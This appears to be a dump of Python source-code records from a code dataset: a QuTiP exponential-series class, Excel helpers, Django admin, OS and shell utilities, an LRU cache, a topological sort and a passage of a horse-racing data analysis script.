num)],\n dtype=object)\n self.dims = self.ampl[0].dims\n self.shape = self.ampl[0].shape\n else:\n num = 1\n self.ampl = np.array([Qobj(q)], dtype=object)\n 
self.dims = self.ampl[0].dims\n self.shape = self.ampl[0].shape\n if isinstance(s, (int, complex, float)):\n if num != 1:\n raise TypeError('Number of rates must match number ' +\n 'of members in object array.')\n self.rates = np.array([s])\n elif isinstance(s, (np.ndarray, list)):\n if len(s) != num:\n raise TypeError('Number of rates must match number ' +\n ' of members in object array.')\n self.rates = np.array(s)\n\n if len(self.ampl) != 0:\n # combine arrays so that they can be sorted together\n zipped = list(zip(self.rates, self.ampl))\n zipped.sort() # sort rates from lowest to highest\n rates, ampl = list(zip(*zipped)) # get back rates and ampl\n self.ampl = np.array(ampl, dtype=object)\n self.rates = np.array(rates)\n\n def __str__(self): # string of ESERIES information\n self.tidyup()\n s = \"ESERIES object: \" + str(len(self.ampl)) + \" terms\\n\"\n s += \"Hilbert space dimensions: \" + str(self.dims) + \"\\n\"\n for k in range(0, len(self.ampl)):\n s += \"Exponent #\" + str(k) + \" = \" + str(self.rates[k]) + \"\\n\"\n if isinstance(self.ampl[k], sp.spmatrix):\n s += str(self.ampl[k]) + \"\\n\"\n else:\n s += str(self.ampl[k]) + \"\\n\"\n return s\n\n def __repr__(self):\n return self.__str__()\n\n # Addition with ESERIES on left (ex. ESERIES+5)\n def __add__(self, other):\n right = eseries(other)\n if self.dims != right.dims:\n raise TypeError(\"Incompatible operands for ESERIES addition\")\n out = eseries()\n out.dims = self.dims\n out.shape = self.shape\n out.ampl = np.append(self.ampl, right.ampl)\n out.rates = np.append(self.rates, right.rates)\n return out\n\n # Addition with ESERIES on right(ex. 5+ESERIES)\n def __radd__(self, other):\n return self + other\n\n # define negation of ESERIES\n def __neg__(self):\n out = eseries()\n out.dims = self.dims\n out.shape = self.shape\n out.ampl = -self.ampl\n out.rates = self.rates\n return out\n\n # Subtraction with ESERIES on left (ex. ESERIES-5)\n def __sub__(self, other):\n return self + (-other)\n\n # Subtraction with ESERIES on right (ex. 5-ESERIES)\n def __rsub__(self, other):\n return other + (-self)\n\n # Multiplication with ESERIES on left (ex. ESERIES*other)\n def __mul__(self, other):\n\n if isinstance(other, eseries):\n out = eseries()\n out.dims = self.dims\n out.shape = self.shape\n\n for i in range(len(self.rates)):\n for j in range(len(other.rates)):\n out += eseries(self.ampl[i] * other.ampl[j],\n self.rates[i] + other.rates[j])\n\n return out\n else:\n out = eseries()\n out.dims = self.dims\n out.shape = self.shape\n out.ampl = self.ampl * other\n out.rates = self.rates\n return out\n\n # Multiplication with ESERIES on right (ex. other*ESERIES)\n def __rmul__(self, other):\n out = eseries()\n out.dims = self.dims\n out.shape = self.shape\n out.ampl = other * self.ampl\n out.rates = self.rates\n return out\n\n #\n # todo:\n # select_ampl, select_rate: functions to select some terms given the ampl\n # or rate. This is done with {ampl} or (rate) in qotoolbox. 
we should use\n # functions with descriptive names for this.\n #\n\n #\n # evaluate the eseries for a list of times\n #\n def value(self, tlist):\n \"\"\"\n Evaluates an exponential series at the times listed in ``tlist``.\n\n Parameters\n ----------\n tlist : ndarray\n Times at which to evaluate exponential series.\n\n Returns\n -------\n val_list : ndarray\n Values of exponential series at times in ``tlist``.\n\n \"\"\"\n\n if self.ampl is None or len(self.ampl) == 0:\n # no terms, evaluate to zero\n return np.zeros(np.shape(tlist))\n\n if isinstance(tlist, float) or isinstance(tlist, int):\n tlist = [tlist]\n\n if isinstance(self.ampl[0], Qobj):\n # amplitude vector contains quantum objects\n val_list = []\n\n for j in range(len(tlist)):\n exp_factors = np.exp(np.array(self.rates) * tlist[j])\n\n val = 0\n for i in range(len(self.ampl)):\n val += self.ampl[i] * exp_factors[i]\n\n val_list.append(val)\n\n val_list = np.array(val_list, dtype=object)\n else:\n # the amplitude vector contains c numbers\n val_list = np.zeros(np.size(tlist), dtype=complex)\n\n for j in range(len(tlist)):\n exp_factors = np.exp(np.array(self.rates) * tlist[j])\n val_list[j] = np.sum(np.dot(self.ampl, exp_factors))\n\n if all(np.imag(val_list) == 0):\n val_list = np.real(val_list)\n if len(tlist) == 1:\n return val_list[0]\n else:\n return val_list\n\n def spec(self, wlist):\n \"\"\"\n Evaluate the spectrum of an exponential series at frequencies\n in ``wlist``.\n\n Parameters\n ----------\n wlist : array_like\n Array/list of frequencies.\n\n Returns\n -------\n val_list : ndarray\n Values of exponential series at frequencies in ``wlist``.\n\n \"\"\"\n val_list = np.zeros(np.size(wlist))\n\n for i in range(len(wlist)):\n val_list[i] = 2 * np.real(\n np.dot(self.ampl, 1. / (1.0j * wlist[i] - self.rates)))\n\n return val_list\n\n def tidyup(self, *args):\n \"\"\" Returns a tidier version of exponential series.\n \"\"\"\n #\n # combine duplicate entries (same rate)\n #\n rate_tol = 1e-10\n ampl_tol = 1e-10\n\n ampl_dict = {}\n unique_rates = {}\n ur_len = 0\n\n for r_idx in range(len(self.rates)):\n\n # look for a matching rate in the list of unique rates\n idx = -1\n for ur_key in unique_rates.keys():\n if abs(self.rates[r_idx] - unique_rates[ur_key]) < rate_tol:\n idx = ur_key\n break\n\n if idx == -1:\n # no matching rate, add it\n unique_rates[ur_len] = self.rates[r_idx]\n ampl_dict[ur_len] = [self.ampl[r_idx]]\n ur_len = len(unique_rates)\n else:\n # found matching rate, append amplitude to its list\n ampl_dict[idx].append(self.ampl[r_idx])\n\n # create new amplitude and rate list with only unique rates, and\n # nonzero amplitudes\n self.rates = np.array([])\n self.ampl = np.array([])\n for ur_key in unique_rates.keys():\n total_ampl = np.sum(np.asarray(ampl_dict[ur_key], dtype=object))\n\n if (isinstance(total_ampl, float) or\n isinstance(total_ampl, complex)):\n if abs(total_ampl) > ampl_tol:\n self.rates = np.append(self.rates, unique_rates[ur_key])\n self.ampl = np.append(self.ampl, total_ampl)\n else:\n if abs(total_ampl.full()).max() > ampl_tol:\n self.rates = np.append(self.rates, unique_rates[ur_key])\n self.ampl = np.append(self.ampl,\n np.asarray(total_ampl,\n dtype=object))\n\n return self\n\n\n# -----------------------------------------------------------------------------\n#\n# wrapper functions for accessing the class methods (for compatibility with\n# quantum optics toolbox)\n#\ndef esval(es, tlist):\n \"\"\"\n Evaluates an exponential series at the times listed in ``tlist``.\n\n Parameters\n ----------\n 
tlist : ndarray\n Times at which to evaluate exponential series.\n\n Returns\n -------\n val_list : ndarray\n Values of exponential series at times in ``tlist``.\n\n \"\"\"\n return es.value(tlist)\n\n\ndef esspec(es, wlist):\n \"\"\"Evaluate the spectrum of an exponential series at frequencies\n in ``wlist``.\n\n Parameters\n ----------\n wlist : array_like\n Array/list of frequencies.\n\n Returns\n -------\n val_list : ndarray\n Values of exponential series at frequencies in ``wlist``.\n\n \"\"\"\n return es.spec(wlist)\n\n\ndef estidy(es, *args):\n \"\"\"\n Returns a tidier version of exponential series.\n \"\"\"\n return es.tidyup()\n","sub_path":"qutip/eseries.py","file_name":"eseries.py","file_ext":"py","file_size_in_byte":13857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"545147262","text":"# public functions used in project\r\n\r\nfrom openpyxl import load_workbook\r\n\r\n# shift list \"L\" elements to left and repeat last element \"n\" times\r\ndef shift(L, n): # list\r\n ext = [L[-1]] * len(L)\r\n return (L[n:] + ext)[:len(L)]\r\n\r\n\r\n# get number of rows from openpyxl.sheet.calculate_dimension as str\r\ndef get_row_count(coord): # str\r\n i = -1\r\n rc = ''\r\n while True:\r\n if coord[i].isnumeric():\r\n rc = coord[i] + rc\r\n i -= 1\r\n else:\r\n return rc\r\n\r\n\r\n# load droop results from last __trend.xlsx file\r\ndef droop_results(file_name):\r\n wb = load_workbook(file_name, read_only=True, data_only=True)\r\n sh = wb['Droop']\r\n row_count = int(get_row_count(sh.calculate_dimension()))\r\n drp_dic = dict()\r\n for r in range(2, row_count):\r\n drp_dic[sh.cell(r, 1).value] = sh.cell(r, 11).value\r\n\r\n del wb, sh\r\n return drp_dic\r\n\r\n\r\n# class for trend values from \"__trend.xlsm\" and make data for individual excel files\r\nclass IndividualTrends:\r\n def __init__(self, sheet, range):\r\n self.sh = sheet\r\n self.rng = range\r\n\r\n @property\r\n def TimeValues(self):\r\n return [self.sh.cell(1, c).value for c in range(10, 677)]\r\n\r\n @property\r\n def FrqValues(self):\r\n return [self.sh.cell(2, c).value for c in range(10, 677)]\r\n\r\n @property\r\n def PowerValues(self):\r\n pwr_dic = dict()\r\n for row in self.rng[2:]:\r\n pwr_values = []\r\n n = int()\r\n unit = str()\r\n for c, cell in enumerate(row):\r\n if c > 668:\r\n break\r\n if c == 0:\r\n n = cell.value\r\n elif c == 1:\r\n unit = cell.value\r\n else:\r\n pwr_values.append(cell.value)\r\n pwr_values = shift(pwr_values, n)\r\n pwr_dic[unit] = pwr_values\r\n\r\n return pwr_dic\r\n\r\n\r\nclass GenerateExcelChart:\r\n def __init__(self, file_name):\r\n self.fname = file_name\r\n\r\n def __enter__(self):\r\n self.wb = load_workbook('__chart.xlsx')\r\n return self.wb\r\n\r\n def __exit__(self, exc_type, exc_val, exc_tb):\r\n self.wb.save(self.fname)\r\n del self.wb\r\n","sub_path":"project_functions.py","file_name":"project_functions.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"406850986","text":"from django.contrib import admin\nfrom bandsoc.apps.forum.models import Category, ForumItem, PollOption, Post\n\n\nclass PollOptionInline(admin.TabularInline):\n model = PollOption\n\n\nclass PostInline(admin.TabularInline):\n model = Post\n\n\nclass ForumItemAdmin(admin.ModelAdmin):\n inlines = [PollOptionInline, PostInline]\n\n\nadmin.site.register(Category, admin.ModelAdmin)\nadmin.site.register(ForumItem, 
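A minimal usage sketch for the eseries class above; this mirrors the old QuTiP documentation example and assumes a QuTiP 4.x install (the eseries module was dropped in QuTiP 5):

import numpy as np
from qutip import sigmax
from qutip.eseries import eseries, esval

# One term: amplitude sigmax(), complex rate 1j, so value(t) = sigmax()*exp(1j*t).
es = eseries(sigmax(), 1j)
print(es.value(0.0))                    # Qobj equal to sigmax()
print(esval(es, np.linspace(0, 1, 3)))  # wrapper form of the same evaluation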
ForumItemAdmin)\n","sub_path":"bandsoc/apps/forum/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"28005015","text":"\n\nimport os\nimport datetime\nimport subprocess\n\ndef listfile_recursive(path = '.'):\n for root, dirs, fs in os.walk(path):\n for f in fs:\n yield os.path.join(root, f)\n\ndef listfile(path = '.'):\n for f in os.listdir(path):\n if os.path.isdir(os.path.join(path, f)):\n continue\n yield os.path.join(path, f)\n\ndef run_shell(sh):\n res = subprocess.run([sh], \n stdout = subprocess.PIPE, \n stderr = subprocess.STDOUT, \n shell = True)\n return res.returncode, res.stdout.decode('utf-8') \n\ndef now():\n return str(datetime.datetime.now()).replace(' ', '-').replace(':', '-').replace('.', '')\n","sub_path":"easy/_os.py","file_name":"_os.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"593846121","text":"#!/usr/bin/env python3\nimport os\nimport subprocess\n\n'''\nQ10 from assignments\nShow a menu to the user until the user selects quit, and display a corresponding OS message\n'''\n\nwhile True:\n print('''\n please choose OS from the List:\n 1. macOS\n 2. linux\n 3. windows\n ''')\n choice = input(\"Enter your OS choice here: \").strip().lower()\n subprocess.call('clear', shell=True)\n\n if choice in (\"1\", \"macos\", \"apple\", \"imac\"):\n print(\"hmm.. so you're the richest kid in the town..!!\")\n\n elif choice in (\"2\", \"linux\", \"unix\", \"redhat\", \"ubuntu\"):\n print(\"you must be a GEEK!, what are you coding these days?\")\n\n elif choice in (\"3\", \"windows\", \"microsoft\", \"xp\", \"vista\"):\n print(\"Kids! stop playing video games!!\")\n\n else:\n print(\"the OS type you've entered is not available! 
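A quick usage sketch for run_shell from the _os.py record above; it executes through the shell (shell=True), so only trusted command strings should be passed in, and the stderr redirect syntax assumes a POSIX shell:

# run_shell returns (exit code, combined stdout+stderr decoded as UTF-8).
code, out = run_shell('echo hello && echo oops 1>&2')
print(code)  # 0
print(out)   # 'hello' and 'oops' together, since stderr is folded into stdout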
choose from available options 1-3 or type 'q' to quit\")\n quit_input = input(\":\").strip().lower()\n if quit_input in (\"q\", \"quit\"):\n print(\"Good bye!\")\n break\n else:\n pass\n","sub_path":"10_menu.py","file_name":"10_menu.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"589592136","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 5 16:39:53 2018\n\n@author: TZLMYQ\n\"\"\"\n\nclass Solution:\n def findOrder(self, numCourses, prerequisites):\n \"\"\"\n :type numCourses: int\n :type prerequisites: List[List[int]]\n :rtype: List[int]\n \"\"\"\n d = {i:set() for i in range(numCourses)}\n for courses in prerequisites:\n d[courses[1]].add(courses[0])\n visited = [False]*numCourses\n stack = []\n \n def topologicalSort(v, visited, stack):\n visited[v] = True\n for i in d[v]:\n if visited[i] == False:\n topologicalSort(i, visited, stack)\n stack.append(v)\n \n for i in range(numCourses):\n if visited[i] == False:\n topologicalSort(i, visited, stack)\n # nodes are appended in DFS finish order (dependents first), so the\n # stack must be reversed to get a valid course order\n return stack[::-1]\n \n \nnumCourses = 4\nprerequisites = [[1,0],[2,0],[3,1],[3,2]]\n \nsolution = Solution()\nprint(solution.findOrder(numCourses, prerequisites))\n \n \n\n","sub_path":"210courses_schedul2.py","file_name":"210courses_schedul2.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"565357085","text":"import sys\n\nfrom datetime import datetime\nfrom threading import RLock\n\nfrom .CacheStorage import CachedItem, ItemNotCached\nfrom .MemoryStorage import MemoryStorage\n\n\nclass ItemExpired(ItemNotCached): pass\n\n\nclass LRUCache:\n '''\n Collection of data where data may be removed to make room\n\n Each piece of data is indexed by a unique key.\n\n Least Recently Used implies that when room is needed in the\n collection, whatever key has been accessed least recently\n is silently removed from the collection.\n\n Actual storage of the data depends on the storage object\n attached, and defaults to in-memory (MemoryStorage)\n '''\n\n def __init__(self, storage=None, max_size=None, sizeof=None, max_age=None):\n '''\n :param storage: Storage for data (CacheStorage)\n :param max_size: Maximum size to store in cache\n :param sizeof: Function to use for calculating the size of data cached\n :param max_age: Max time to hold cached items for (timedelta)\n '''\n self.storage = storage or MemoryStorage()\n self.max_size = max_size\n self.__sizeof = sizeof\n self.max_age = max_age\n self.lock = RLock()\n\n\n def put(self, key, data, expires_in=None, size=None):\n '''\n Add an object to the cache\n\n :param key: Key to use to retrieve this item.\n :param data: The actual item to cache.\n :param expires_in: timedelta to specify when object should expire\n :param size: Size of the entry if known (will skip sizeof calc)\n :return:\n '''\n\n # Determine size of data\n if size is None:\n if self.__sizeof is not None:\n size = self.__sizeof(data)\n else:\n size = sys.getsizeof(key) + sys.getsizeof(data)\n\n # Time to expire\n if expires_in is not None:\n expire_after = datetime.now() + expires_in\n elif self.max_age is not None:\n expire_after = datetime.now() + self.max_age\n else:\n expire_after = None\n\n item = CachedItem(data, size=size, expires=expire_after)\n\n # Manipulate storage\n with self.lock:\n\n # Remove item if already exists\n if self.storage.has_key(key):\n self._remove_item_from_storage(key)\n\n # Sanity check: Data too big for 
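The findOrder record above builds a valid finish order (after the stack reversal), but LeetCode 210 also requires returning [] when the prerequisite graph has a cycle; a sketch with three-state marking (the WHITE/GRAY/BLACK names are mine) adds that check:

def find_order_with_cycle_check(num_courses, prerequisites):
    graph = {i: set() for i in range(num_courses)}
    for course, pre in prerequisites:
        graph[pre].add(course)
    WHITE, GRAY, BLACK = 0, 1, 2  # unvisited / on the current DFS path / finished
    color = [WHITE] * num_courses
    order = []

    def dfs(v):
        color[v] = GRAY
        for nxt in graph[v]:
            if color[nxt] == GRAY:  # back edge: a cycle, so no valid order
                return False
            if color[nxt] == WHITE and not dfs(nxt):
                return False
        color[v] = BLACK
        order.append(v)  # finish order puts dependents first, reverse at the end
        return True

    for v in range(num_courses):
        if color[v] == WHITE and not dfs(v):
            return []
    return order[::-1]

print(find_order_with_cycle_check(4, [[1, 0], [2, 0], [3, 1], [3, 2]]))  # e.g. [0, 2, 1, 3]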
storage\n if self.max_size is not None and size > self.max_size:\n return\n\n # Make sure there is space\n if self.max_size is not None:\n self.make_room_for(size)\n\n # Save item\n self.storage.add(key, item)\n\n\n def get(self, key):\n return self[key]\n\n\n def __getitem__(self, key):\n '''Get data from cache'''\n with self.lock:\n item = self.storage.get(key)\n if item.expires_at is not None and item.expires_at < datetime.now():\n self.remove(key)\n raise ItemExpired()\n self.storage.touch_last_used(key)\n return item.data\n\n\n def __setitem__(self, key, data):\n '''Add item to the cache'''\n self.put(key, data)\n\n\n def keys(self):\n with self.lock:\n return self.storage.keys()\n\n\n def items(self):\n with self.lock:\n for key, item in self.storage.items():\n yield key, item.data\n\n\n def _remove_item_from_storage(self, key):\n '''\n Remove an item from storage\n\n Intended for internal use. No state checking\n '''\n with self.lock:\n self.storage.remove(key)\n\n\n def __delitem__(self, key):\n self._remove_item_from_storage(key)\n\n\n def remove(self, key):\n self._remove_item_from_storage(key)\n\n\n @property\n def num_items(self):\n return self.storage.num_items\n\n\n def close(self):\n with self.lock:\n self.storage.close()\n self.storage = None\n\n\n def clean_expired(self):\n '''Clean old entries out of cache'''\n with self.lock:\n for key, item in self.storage.expired_items():\n self.remove(key)\n\n\n @property\n def total_size_stored(self):\n return self.storage.total_size_stored\n\n\n def make_room_for(self, size):\n '''\n Make room for a new item of the given size\n\n Note: Possible race condition if storage supports multiple LRUCache objects\n in separate processes and called concurrently. Solve this in storage\n engine implementation if needed.\n\n :param size: Size of the new object coming in\n :param max_size: Size limit for the cache storage\n '''\n with self.lock:\n if self.max_size > 0 and size > 0:\n while self.storage.total_size_stored + size > self.max_size:\n self.storage.pop_oldest()\n\n\n","sub_path":"lru/LRUCache.py","file_name":"LRUCache.py","file_ext":"py","file_size_in_byte":4862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"347091483","text":"from typing import List\n\n\nclass Place(object):\n place_id: int\n booked: int\n used: int\n amount_of_pending: int\n amount_of_canceled: int\n amount_of_rejected: int\n amount_of_accepted: int\n amount_of_completed: int\n user_booked: int\n user_used: int\n province_name: str\n deal_title: str\n place_name: str\n business_name: str\n\n def __init__(self,\n place_id: int,\n booked: int,\n used: int,\n amount_of_pending: int,\n amount_of_canceled: int,\n amount_of_rejected: int,\n amount_of_accepted: int,\n amount_of_completed: int,\n user_booked: int,\n user_used: int,\n province_name: str,\n deal_title: str,\n place_name: str,\n business_name: str\n ) \\\n -> None:\n self.place_id = place_id\n self.booked = booked\n self.used = used\n self.amount_of_pending = amount_of_pending\n self.amount_of_canceled = amount_of_canceled\n self.amount_of_rejected = amount_of_rejected\n self.amount_of_accepted = amount_of_accepted\n self.amount_of_completed = amount_of_completed\n self.user_booked = user_booked\n self.user_used = user_used\n self.province_name = province_name\n self.deal_title = deal_title\n self.place_name = place_name\n self.business_name = business_name\n\n\nclass DailyReservationReport(object):\n reservation_id: int\n places: List[Place]\n\n def 
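A usage sketch for the LRUCache above, assuming the package imports as lru per the record's sub_path:

from datetime import timedelta
from lru.LRUCache import LRUCache

# Count entries rather than bytes by making every item report size 1.
cache = LRUCache(max_size=2, sizeof=lambda data: 1, max_age=timedelta(minutes=5))
cache['a'] = 1
cache['b'] = 2
cache['c'] = 3       # make_room_for() pops 'a', the least recently used key
print(cache.keys())  # only 'b' and 'c' remain on the default MemoryStorage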
__init__(self, reservation_id: int, places: List[Place]):\n self.reservation_id = reservation_id\n self.places = places\n","sub_path":"main/model/daily_reservation_report.py","file_name":"daily_reservation_report.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"221731744","text":"from scripts.jra_target_script import Ext, Ld as TargetLd, CreateFile\nfrom modules.jra_jrdb_download import JrdbDownload\nimport my_config as mc\nimport modules.util as mu\nimport pandas as pd\n\nfrom datetime import datetime as dt\nfrom datetime import timedelta\nimport sys\nimport os\n\nclass Ld(TargetLd):\n target_path = mc.TARGET_PATH\n\n def set_odds_df(self, type):\n self.odds_df = self.ext.get_odds_df(type)\n\n def set_target_mark_df(self):\n raceuma_df = self.ext.get_raceuma_before_table_base()[[\"RACE_KEY\", \"UMABAN\"]].copy()\n main_mark_df = self._get_target_mark_df(\"\")\n win_mark_df = self._get_target_mark_df(\"UmaMark2/\")\n jiku_mark_df = self._get_target_mark_df(\"UmaMark3/\")\n tb_us_mark_df = self._get_target_mark_df(\"UmaMark4/\")\n tb_zg_mark_df = self._get_target_mark_df(\"UmaMark5/\")\n nige_mark_df = self._get_target_mark_df(\"UmaMark6/\")\n agari_mark_df = self._get_target_mark_df(\"UmaMark7/\")\n sim_mark_df = self._get_target_mark_df(\"UmaMark8/\")\n raceuma_df = pd.merge(raceuma_df, main_mark_df, on=[\"RACE_KEY\", \"UMABAN\"], how=\"left\")\n raceuma_df = pd.merge(raceuma_df, win_mark_df.rename(columns={\"印\": \"勝\"}), on=[\"RACE_KEY\", \"UMABAN\"], how=\"left\")\n raceuma_df = pd.merge(raceuma_df, jiku_mark_df.rename(columns={\"印\": \"軸\"}), on=[\"RACE_KEY\", \"UMABAN\"], how=\"left\")\n raceuma_df = pd.merge(raceuma_df, tb_us_mark_df.rename(columns={\"印\": \"US\"}), on=[\"RACE_KEY\", \"UMABAN\"], how=\"left\")\n raceuma_df = pd.merge(raceuma_df, tb_zg_mark_df.rename(columns={\"印\": \"ZG\"}), on=[\"RACE_KEY\", \"UMABAN\"], how=\"left\")\n raceuma_df = pd.merge(raceuma_df, nige_mark_df.rename(columns={\"印\": \"逃\"}), on=[\"RACE_KEY\", \"UMABAN\"], how=\"left\")\n raceuma_df = pd.merge(raceuma_df, agari_mark_df.rename(columns={\"印\": \"上\"}), on=[\"RACE_KEY\", \"UMABAN\"], how=\"left\")\n raceuma_df = pd.merge(raceuma_df, sim_mark_df.rename(columns={\"印\": \"類\"}), on=[\"RACE_KEY\", \"UMABAN\"], how=\"left\")\n self.target_mark_df = raceuma_df.copy()\n\n def set_target_race_mark(self):\n self.race_mark_df = self._get_main_race_mark_df()\n\n def _get_main_race_mark_df(self):\n target_file_list = self.race_file_df[\"file_id\"].drop_duplicates().tolist()\n mark_df = pd.DataFrame()\n for file in target_file_list:\n file_df = self.race_file_df.query(f\"file_id == '{file}'\").copy()\n with open(self.target_path + \"UM\" + file + \".DAT\", 'r', encoding=\"ms932\") as f:\n file_dat = f.readlines()\n file_dat = file_dat[:len(file_df.index)]\n file_df.loc[:, \"mark_text\"] = file_dat\n mark_df = pd.concat([mark_df, file_df])\n mark_df.loc[:, \"mark_text\"] = mark_df[\"mark_text\"].apply(lambda x: self.replace_line(x))\n mark_df.loc[:, \"レース印\"] = mark_df[\"mark_text\"].str[0:6]\n race_mark_df = mark_df[[\"RACE_KEY\", \"レース印\"]].copy()\n return race_mark_df\n\n def _get_target_mark_df(self, type):\n target_file_list = self.race_file_df[\"file_id\"].drop_duplicates().tolist()\n mark_df = pd.DataFrame()\n for file in target_file_list:\n print(file)\n file_df = self.race_file_df.query(f\"file_id == '{file}'\").copy()\n with open(self.target_path + type + \"UM\" + file + \".DAT\", 'r', 
encoding=\"ms932\") as f:\n file_dat = f.readlines()\n file_dat = file_dat[:len(file_df.index)]\n file_df.loc[:, \"mark_text\"] = file_dat\n mark_df = pd.concat([mark_df, file_df])\n mark_df.loc[:, \"mark_text\"] = mark_df[\"mark_text\"].apply(lambda x: self.replace_line(x))\n mark_df.loc[:, \"レース印1\"] = mark_df[\"mark_text\"].str[0:6]\n mark_df.loc[:, \"01\"] = mark_df[\"mark_text\"].str[6:8]\n mark_df.loc[:, \"02\"] = mark_df[\"mark_text\"].str[8:10]\n mark_df.loc[:, \"03\"] = mark_df[\"mark_text\"].str[10:12]\n mark_df.loc[:, \"04\"] = mark_df[\"mark_text\"].str[12:14]\n mark_df.loc[:, \"05\"] = mark_df[\"mark_text\"].str[14:16]\n mark_df.loc[:, \"06\"] = mark_df[\"mark_text\"].str[16:18]\n mark_df.loc[:, \"07\"] = mark_df[\"mark_text\"].str[18:20]\n mark_df.loc[:, \"08\"] = mark_df[\"mark_text\"].str[20:22]\n mark_df.loc[:, \"09\"] = mark_df[\"mark_text\"].str[22:24]\n mark_df.loc[:, \"10\"] = mark_df[\"mark_text\"].str[24:26]\n mark_df.loc[:, \"11\"] = mark_df[\"mark_text\"].str[26:28]\n mark_df.loc[:, \"12\"] = mark_df[\"mark_text\"].str[28:30]\n mark_df.loc[:, \"13\"] = mark_df[\"mark_text\"].str[30:32]\n mark_df.loc[:, \"14\"] = mark_df[\"mark_text\"].str[32:34]\n mark_df.loc[:, \"15\"] = mark_df[\"mark_text\"].str[34:36]\n mark_df.loc[:, \"16\"] = mark_df[\"mark_text\"].str[36:38]\n mark_df.loc[:, \"17\"] = mark_df[\"mark_text\"].str[38:40]\n mark_df.loc[:, \"18\"] = mark_df[\"mark_text\"].str[40:42]\n uma_mark_df = mark_df[[\"RACE_KEY\", \"01\", \"02\", \"03\", \"04\", \"05\", \"06\", \"07\", \"08\", \"09\", \"10\", \"11\", \"12\", \"13\", \"14\", \"15\", \"16\", \"17\", \"18\"]].copy().set_index(\"RACE_KEY\")\n uma_mark_df = uma_mark_df.stack()\n uma_mark_df = uma_mark_df.reset_index()\n uma_mark_df.columns = [\"RACE_KEY\", \"UMABAN\", \"印\"]\n return uma_mark_df.copy()\n\n def replace_line(self, line):\n import unicodedata\n count = 0\n new_line = ''\n for c in line:\n if unicodedata.east_asian_width(c) in 'FWA':\n new_line += c + ' '\n count += 2\n else:\n new_line += c\n count += 1\n return new_line\n\nclass Simlation(CreateFile):\n def __init__(self, start_date, end_date, term_start_date, term_end_date, test_flag):\n self.start_date = start_date\n self.end_date = end_date\n self.test_flag = test_flag\n self.dict_path = mc.return_jra_path(test_flag)\n self.target_path = mc.TARGET_PATH\n self.ext_score_path = self.target_path + 'ORIGINAL_DATA/'\n self.ld = self._get_load_object(\"dummy\", start_date, end_date, False, test_flag)\n self._set_base_df(term_start_date, term_end_date)\n\n def _get_load_object(self, version_str, start_date, end_date, mock_flag, test_flag):\n ld = Ld(version_str, start_date, end_date, mock_flag, test_flag)\n return ld\n\n def _set_base_df(self, term_start_date, term_end_date):\n self.ld.set_race_df()\n self.ld.set_race_file_df()\n self.ld.set_target_mark_df()\n self.ld.set_target_race_mark()\n self.ld.set_haraimodoshi_df()\n base_term_df = self.ld.race_df.query(f\"NENGAPPI >= '{term_start_date}' and NENGAPPI <= '{term_end_date}'\")[[\"RACE_KEY\"]].copy()\n self.res_raceuma_df = self.ld.ext.get_raceuma_table_base()[[\"RACE_KEY\", \"UMABAN\", \"着順\", \"確定単勝オッズ\", \"確定単勝人気順位\", \"レース脚質\", \"単勝\", \"複勝\", \"テン指数結果順位\", \"上がり指数結果順位\"]].copy()\n self.race_df = self.ld.race_df[[\"RACE_KEY\", \"場コード\", \"距離\", \"芝ダ障害コード\", \"種別\", \"条件\", \"天候コード\", \"芝馬場状態コード\", \"ダ馬場状態コード\", \"COURSE_KEY\", \"target_date\", \"距離グループ\", \"非根幹\"]].copy()\n self.race_df.loc[:, \"年月\"] = self.race_df[\"target_date\"].str[0:6]\n self.race_df = pd.merge(self.race_df, 
self.ld.race_mark_df, on =\"RACE_KEY\")\n self.race_df = pd.merge(self.race_df, base_term_df, on=\"RACE_KEY\")\n self.target_mark_df = self.ld.target_mark_df.copy()\n self.target_mark_df = pd.merge(self.target_mark_df, base_term_df, on=\"RACE_KEY\")\n self.haraimodoshi_dict = self.ld.dict_haraimodoshi\n\n def get_sim_tanpuku_df(self, uma1_df):\n add_uma1_df = pd.merge(uma1_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"])\n self.ld.set_odds_df(\"馬連\")\n odds_df = self.ld.odds_df[[\"RACE_KEY\", \"UMABAN\", \"単勝オッズ\", \"複勝オッズ\"]]\n target_df = pd.merge(add_uma1_df, odds_df, on=[\"RACE_KEY\", \"UMABAN\"])\n target_df = pd.merge(target_df, self.race_df, on=\"RACE_KEY\")\n return target_df\n\n def calc_tanpuku_result(self, target_df):\n total_count = len(target_df.index)\n if total_count == 0:\n return pd.Series()\n race_count = len(target_df[\"RACE_KEY\"].drop_duplicates())\n uma1_count = len(target_df[[\"RACE_KEY\", \"UMABAN\"]].drop_duplicates().index)\n tansho_hit = len(target_df.query(\"単勝 != 0\").index)\n fukusho_hit = len(target_df.query(\"複勝 != 0\").index)\n tansho_hit_rate = round(tansho_hit / uma1_count * 100, 1)\n fukusho_hit_rate = round(fukusho_hit / uma1_count * 100, 1)\n race_tansho_hit_rate = round(tansho_hit / race_count * 100, 1)\n race_fukusho_hit_rate = round(fukusho_hit / race_count * 100, 1)\n tan_return_qua = target_df.query(\"単勝 != 0\")[\"単勝\"].quantile(q=[0, 0.25, 0.5, 0.75, 1])\n tan_return_min = round(tan_return_qua[0])\n tan_return_25 = round(tan_return_qua[0.25])\n tan_return_med = round(tan_return_qua[0.50])\n tan_return_75 = round(tan_return_qua[0.75])\n tan_return_max = round(tan_return_qua[1])\n tan_return_all = round(target_df[\"単勝\"].sum())\n tan_return_avg = round(target_df[\"単勝\"].mean(),1)\n fuku_return_qua = target_df.query(\"複勝 != 